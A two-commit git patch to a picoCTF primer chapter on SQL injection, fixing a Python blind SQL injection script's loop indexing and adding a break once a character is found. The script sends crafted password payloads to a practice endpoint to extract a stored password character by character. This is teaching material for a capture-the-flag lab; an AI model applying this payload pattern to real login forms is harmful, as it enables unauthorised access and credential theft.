From 5b3d94d0e06def3342a65f19108abc44e16357c5 Mon Sep 17 00:00:00 2001
From: Abhinav Adhikari <167470786+JollyFrolics@users.noreply.github.com>
Date: Tue, 1 Oct 2024 02:00:42 +0545
Subject: [PATCH 1/2] Update sql.adoc

Improved code
---
 chapters/sql.adoc | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/chapters/sql.adoc b/chapters/sql.adoc
index 967b4a4..6d1f6b6 100644
--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -252,13 +252,14 @@ for i in range(40):
     accum += letter
 
     r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
-    + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
+    + letter +"'=( select substr(binary password,"+str(i + 1)+",1) from pico_blind_injection where id=1 ) and ''= '")
 
     if 'NOTHING FOUND...' in r.text:
       accum = accum[:-1]
       print("nope")
     else:
       print(f"We found the character: {letter}")
+      break
 
 print(accum)
 ----

From 096ae6fd5d1f3aada52d6914690c5ccd7d2d30fa Mon Sep 17 00:00:00 2001
From: Abhinav Adhikari <167470786+JollyFrolics@users.noreply.github.com>
Date: Tue, 1 Oct 2024 02:24:49 +0545
Subject: [PATCH 2/2] Fixed code in blind SQL injection to avoid unnecessary
 iteration

---
 chapters/sql.adoc | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/chapters/sql.adoc b/chapters/sql.adoc
index 6d1f6b6..cd916b4 100644
--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -1,4 +1,4 @@
-
+        
 == Infiltrating in a database 
 [discrete]
 ===== Samuel Sabogal Pardo
@@ -247,12 +247,12 @@ import requests
 from string import printable
 
 accum = ""
-for i in range(40):
+for i in range(1, 40):
   for letter in printable:
     accum += letter
 
     r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
-    + letter +"'=( select substr(binary password,"+str(i + 1)+",1) from pico_blind_injection where id=1 ) and ''= '")
+    + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
 
     if 'NOTHING FOUND...' in r.text:
       accum = accum[:-1]